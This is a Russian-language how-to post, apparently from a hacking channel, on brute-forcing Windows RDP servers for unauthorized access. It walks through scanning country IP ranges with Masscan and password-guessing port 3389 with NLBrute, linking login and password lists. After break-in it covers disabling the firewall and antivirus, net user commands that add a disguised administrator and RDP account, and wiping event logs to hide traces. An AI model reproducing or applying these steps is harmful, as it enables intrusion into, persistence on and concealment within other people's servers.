Мануал по бруту дедиков
💻Hacker News💻 [Life-Hack]🖥 August 31, 2018Что нужно, чтобы начать?
1) Во-первых, нужна машина, с которой будем делать брут и скан диапазонов. Это может быть мощный сервер, впс или уже купленный дедик. Ни в коем случае не юзайте свой комп;
2) Список IP-диапазонов нужных стран;
3) Софт для парсинга IP-диапазонов;
4) Софт для брута дедиков;
5) Логины и пароли для брута аля словари.
Конфиг
У каждого софта есть свои минимальные требования к железу. Очень важным параметром является скорость канала. Подойдёт от 20мб/с, в идеале нужен 1Gb.
Список IP-диапазонов
Выбираем нужную страну, копируем список, вставляем в сканер (например в Masscan).
http://www.find-ip-address.org/ip-country/
https://www.countryipblocks.net/country_selection.php
http://www.proxyserverprivacy.com/ipaddress_range.php
http://www.ipaddresslocation.org/ip_ranges/get_ranges.php
Софт для парсинга IP-диапазонов
Наверно, каждый знает про Masscan – это самый оптимальный вариант. Для удобства будем использовать GUI для Windows. Также перед парсингом нужно будет установить программу Winpcap, без неё не будет работать скан.
Настройка очень простая, загружаем IP-диапазоны, выбираем количество потоков, нужный порт, нажимаем Scan и уходим по своим делам. Чем больше диапазонов, тем дольше будет парсинг. Может занять несколько дней, если диапазоны включают несколько стран. Парсинг диапазонов и брут дедиков это разные вещи.
Софт для брута
У каждого софта свои плюсы, поэтому давайте просто рассмотрим на примере NLBrute.
Запускаем софт. Переходим на вкладку "WORK FILES". В поле "Servers" выбираем IP-адреса c нужным нам портом. Поле "Users" – логины, "Passwords" – пароли, и нажимаем Generate. Теперь переходим на вкладку "SETTINGS" и ставим такие параметры:
1) Max attempts (2) – количество попыток подключений к дедику;
2) Thread count (900) – количество потоков;
3) Time(out 50) – таймаут;
4) Default port (3389) – порт.
После настроек во вкладке "BRUTE" нажимайте Start. Если дедик, например, перезагрузился, то в программе можно нажать кнопку Continue и брут продолжится с того момента, на котором закончился.
Good count – количество сбрученых дедиков.
Logins:Passwords
Логины не чувствительны к регистру, т.е. без разницы admin или ADmiN. Плюс ко всему, логин "Администратор" в разных странах пишется по-разному. Например:
Испания – Administrador;
Германия – Verwalter;
Франция – administrateur.
Есть софт, который определяет логины на дедике аля рекогнайзер. Один их них RDP Forcer. Загружаете только список паролей и брутите.
Сбрутили дедики. Что дальше?
Заходим на дедик. Отключаем фаервол и антивирус, если они там есть. Самый оптимальный вариант – это создать свою учётку. Нажмите Win+X, появится контекстное меню, в котором выбираем пункт "Командная строка (администратор)", после чего вводим:
net user LOGIN PASSWORD /add
net localgroup Administrators LOGIN /add
net localgroup "Remote Desktop Users" LOGIN /add
net accounts /maxpwage:unlimited
LOGIN – наш логин. Используйте системные имена типа network, winsystem и т.п чтобы админ не спалил.
PASSWORD – Наш пароль.
После чего выходим с админ учётки и логинимся через новый логин. Если не получается создать свою учётку, воспользуйтесь программой xDedic RDP Patch.
Список логинов: https://pastebin.com/nvRzD8JY
Список паролей: https://pastebin.com/i69fbKJt
Советы
1) Брать сервер для брута стоит лучше в той стране, в который Вы собираетесь брутить дедики. Не логично брать, например, сервер в Польше и брутить дедики в Австралии. Берите сервер в нужном регионе.
2) Удаление следов аля логов. В архиве есть файл clear.cmd. Каждый раз перед выходом с дедика запускайте скрипт через администратора, он чистит все журналы и логи.
3) Cleaners. Часто бывает, что попадается дедик с маленьким количеством ОЗУ, либо тормозящих дедик. В данной ситуации нам поможет программа Mem Reduct. Она очищает память через заданный промежуток времени, например каждые 5 минут. Помогает снизить нагрузку на софт. Для чистки системы можете использовать CCleaner + CCEnhancer либо BleachBit. Это лучшие программы в данной категории.
4) Порты. Часто админы меняют порт под RPD с 3389 на другие, нестандартные, такие как 3390, 3392, 3393, 3444 и другие. Используйте диапазоны 3350 - 3500
💻Hacker News💻 [Life-Hack]🖥– Выбери правильную стоону своего разума...